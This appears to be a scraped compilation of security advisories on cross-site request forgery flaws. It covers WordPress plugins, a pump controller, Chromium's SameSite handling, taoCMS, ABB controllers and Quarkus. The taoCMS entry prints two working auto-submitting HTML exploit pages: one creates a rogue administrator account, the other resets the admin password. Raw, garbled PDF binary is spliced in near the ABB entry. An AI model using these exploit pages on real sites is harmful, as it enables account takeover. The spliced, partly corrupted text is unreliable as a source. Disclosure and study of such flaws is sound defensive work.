Cross-Site Request Forgery (CSRF) vulnerability in AutomatorWP plugin <= 2.5.0 leads to object delete.

**Solution**

Update the WordPress AutomatorWP plugin to the latest available version (at least 2.5.1).

Rafshanzani Suhada discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress AutomatorWP Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 2.5.1.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23992: WordPress AutomatorWP – The most flexible and powerful no-code automation plugin for WordPress plugin <= 2.5.0 - Cross Site Request Forgery (CSRF) - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Strategy11 Form Builder Team Formidable Forms plugin <= 5.5.6 versions.

**Solution**

Update the WordPress Formidable Forms plugin to the latest available version (at least 5.5.7).

Rafshanzani Suhada discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Formidable Forms Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has been fixed in version 5.5.7.

**12 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-24419: WordPress Formidable Forms plugin <= 5.5.6 - Cross Site Request Forgery (CSRF) - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Forms by CaptainForm – Form Builder for WordPress plugin <= 2.5.3 versions.

**Solution**

No patched version is available. No reply from the vendor.

Rasi discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Forms by CaptainForm Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-43459: WordPress Forms by CaptainForm <= 2.5.3 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Title: Osprey Pump Controller 1.0.1 Cross-Site Request Forgery  
Advisory ID: ZSL-2023-5753  
Type: Local/Remote  
Impact: Cross-Site Scripting  
Risk: (4/5)  
Release Date: 27.02.2023

**Summary**

Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller.

Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer.

ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities.

We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters.

User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens.

Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access.

**Description**

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

**Vendor**

ProPump and Controls, Inc. - https://www.propumpservice.com | https://www.pumpstationparts.com

**Affected Version**

Software Build ID 20211018, Production 10/18/2021  
Mirage App: MirageAppManager, Release \[1.0.1\]  
Mirage Model 1, RetroBoard II

**Tested On**

Apache/2.4.25 (Raspbian)  
Raspbian GNU/Linux 9 (stretch)  
GNU/Linux 4.14.79-v7+ (armv7l)  
Python 2.7.13 \[GCC 6.3.0 20170516\]  
GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git  
PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)

**Vendor Status**

\[05.01.2023\] Vulnerabilities discovered.  
\[07.01.2023\] Vendor contacted.  
\[09.01.2023\] No response from the vendor.  
\[10.01.2023\] Vendor contacted.  
\[10.01.2023\] CISA contacted through CVD.  
\[10.01.2023\] Submitted to VINCE.  
\[12.01.2023\] CISA/VINCE asked for more details.  
\[13.01.2023\] Provided PoCs to CISA.  
\[13.01.2023\] Provided PoCs to VINCE and discovered XSS in VINCE.  
\[26.01.2023\] No response from VINCE.  
\[26.01.2023\] CISA closes incident: INC000010422052. NCISS Score: Baseline - Negligible (White). A Baseline–Negligible priority incident is an incident that is highly unlikely to affect public health or safety, national security, economic security, foreign relations, civil liberties, or public confidence. No further actions required by CISA.  
\[26.02.2023\] No response from the vendor.  
\[27.02.2023\] Public security advisory released.

**PoC**

osprey\_csrf.html

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://www.cisa.gov/news-events/news/cisa-national-cyber-incident-scoring-system-nciss

**Changelog**

\[27.02.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Osprey Pump Controller 1.0.1 Cross-Site Request Forgery

Protections against cross-site request forgery could be bypassed

Ben Dickson 27 February 2023 at 11:50 UTC

Protections against cross-site request forgery could be bypassed

  

A recently patched bug in the Chromium project could allow malicious actors to bypass a security feature that protects sensitive cookies on Android browsers.

The SameSite setting enables developers to restrict access to cookies. For example, by setting , this can prevent a cookie from showing up in HTTP responses if the user navigates to the website through a link or a redirect request from another website.

**SameSite bypass with intent requests**

Security researcher Axel Chong, however, discovered that he could bypass SameSite protection if he used the intent scheme to navigate to the target website. Intents are external protocol handlers that allow Android apps to open other apps, such as jumping from the browser to the Maps application or from an SMS to the browser.

“I came across this bug when I read this interesting bug on intents,” Chong told The Daily Swig. “As intent URLs could point to the same app (Chrome in this case) and create a fresh browsing context, I had then wondered what kind of security measures that intent URLs could possibly bypass.”

Intent URLs should be considered external sources and be subject to SameSite restrictions. But a proof-of-concept Chong created in Python shows that cookies with settings carry over when the web server initiates a redirection with an intent URL.

Want the latest web security news straight to your inbox? Sign up to our newsletter here

The same scheme also bypasses the header, which determines where the request originated from and enables websites to control access to their resources from external origins.

“Both are usually used to protect against CSRF (cross-site request forgery), so the impact would be bypassing these protections,” Chong said.

**Normal redirects also affected**

Further investigation showed that SameSite cookies are also carried over through simple redirect requests without the intent protocol.

While this was fixed in an earlier version of Chrome, it was later disabled because it caused breaking changes.

The experimental cookie feature flag (chrome://flags/#enable-experimental-cookie-features) would restore the secure behavior and prevent SameSite cookies from being sent across normal redirect requests.

This flag did not affect the insecure behavior of intent redirects. Chong also said that the flag did not affect the behavior and needed to be fixed separately.

**No easy fix**

Fixing the bug was not trivial because the developers had to account for how to determine trusted applications, including browsers.

It was finally decided not to trust intents because “(a) other apps on the device may not be trustworthy, and (b) websites can use Intent URLs/redirects to reflect back to Chrome and potentially use it to bypass SameSite restrictions.”

The lesson here is that given the complicated ways apps and browsers can communicate, developers should use multiple layers of security for their applications.

“These sort of browser security mechanisms (i.e., SameSite cookies, Fetch metadata) are meant to be defense-in-depth only. You should use them but do not rely on them as the only form of defense,” Chong advised.

DON’T MISS Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption

Chromium bug allowed SameSite cookie bypass on Android devices

Zoho ManageEngine Desktop Central and Desktop Central MSP before 10.1.2137.2 allow directory traversal via computerName to AgentLogUploadServlet. A remote, authenticated attacker could upload arbitrary code that would be executed when Desktop Central is restarted. (The attacker could authenticate by exploiting CVE-2021-44515.)

CVE-2022-48362: ZohOwned :: A Critical Authentication Bypass on Zoho ManageEngine Desktop Central

Cross-Site Request Forgery (CSRF) in GitHub repository froxlor/froxlor prior to 2.0.11.

CVE-2023-1033: huntr – Security Bounties for any GitHub repository

Cross Site Request Forgery (CSRF) vulnerability in taoCMS 3.0.2 allows remote attackers to gain escalated privileges via taocms/admin/admin.php.

After the administrator logged in, when he opened following malicious pages, CSRF(Cross Site Request Forgery) vulnerabilities occurred.

**poc:**

**one.html—add a new account which has administrator privileges**

<html\><body\>
<script type\="text/javascript"\>
function post(url,fields)
{
var p \= document.createElement("form");
p.action \= url;
p.innerHTML \= fields;
p.target \= "\_self";
p.method \= "post";
document.body.appendChild(p);
p.submit();
}
function csrf\_hack()
{
var fields;

fields += "<input type='hidden' name='name' value='test' />";
fields += "<input type='hidden' name='passwd' value='test' />";  
fields += "<input type='hidden' name='auth&#95;level' value='admin' />";  
fields += "<input type='hidden' name='auth&#95;cat' value='' />"; 
fields += "<input type='hidden' name='status' value='1' />";
fields += "<input type='hidden' name='action' value='admin' />";
fields += "<input type='hidden' name='id' value='' />";
fields += "<input type='hidden' name='ctrl' value='save' />"; 
fields += "<input type='hidden' name='Submit' value='&#143;&#144;浜&#164;' />";

var url \= "http://127.0.0.1/taocms-3.0.2/admin/admin.php";
post(url,fields);
}
window.onload \= function() { csrf\_hack();}
</script\>
</body\></html\>

  
After finish this CSRF attack, we can see that a new account has been added.

**two.html—change current administrator’s password**

<html\><body\>
<script type\="text/javascript"\>
function post(url,fields)
{
var p \= document.createElement("form");
p.action \= url;
p.innerHTML \= fields;
p.target \= "\_self";
p.method \= "post";
document.body.appendChild(p);
p.submit();
}
function csrf\_hack()
{
var fields;

fields += "<input type='hidden' name='pwd' value='admin123' />";
fields += "<input type='hidden' name='action' value='user' />";  
fields += "<input type='hidden' name='ctrl' value='update' />";  
fields += "<input type='hidden' name='Submit' value='&#191;&#174;&#148;&#185;&#33;' />";  

var url \= "http://127.0.0.1/taocms-3.0.2/admin/admin.php";
post(url,fields);
}
window.onload \= function() { csrf\_hack();}
</script\>
</body\></html\>

After that, the administrator’s will change from ‘admin’ to ‘admin123’.

**Solution:**  
Better add a CSRF token or CAPTCHA for each important request.

CVE-2021-34167: There are two CSRF vulnerabilities that can add administrator account and change administrator password · Issue #6 · taogogo/taocms

Cross-Site Request Forgery (CSRF) vulnerability in ABB Pulsar Plus System Controller NE843_S, ABB Infinity DC Power Plant allows Cross Site Request Forgery.This issue affects Pulsar Plus System Controller NE843_S : comcode 150042936; Infinity DC Power Plant: H5692448 G104 G842 G224L G630-4 G451C(2) G461(2) – comcode 150047415.

%PDF-1.7 %���� 1 0 obj <>/Metadata 476 0 R/ViewerPreferences 477 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/Font<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 595.44 841.92\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��\\Ko�����n���~F#��$��l�\`�������(�����j�M�C������,V}U�U��W�o/�{��2�ys�}yy����\_�W��\_�����ǫ�>|�������������������q�w7����r���ˋ\]^p-��R�A���@���������./"L�a�v�)����6��h�\\^\\�{|y��y�ɞd󆷵Vl��0q>hN��������;2(�|����>�2H���/\`��po'��'7�n<������Ǎ1�@�qC0�Kj�h8�&^��17��p������Xia��\]�'��M1�2����������k��5�����~~

CVE-2022-1607

If the Quarkus Form Authentication session cookie Path attribute is set to `/` then a cross-site attack may be initiated which might lead to the Information Disclosure. This attack can be prevented with the Quarkus CSRF Prevention feature.

**Cross-site Scripting in Quarkus**

Moderate severity GitHub Reviewed Published Feb 23, 2023 to the GitHub Advisory Database • Updated Feb 23, 2023

Tag

#csrf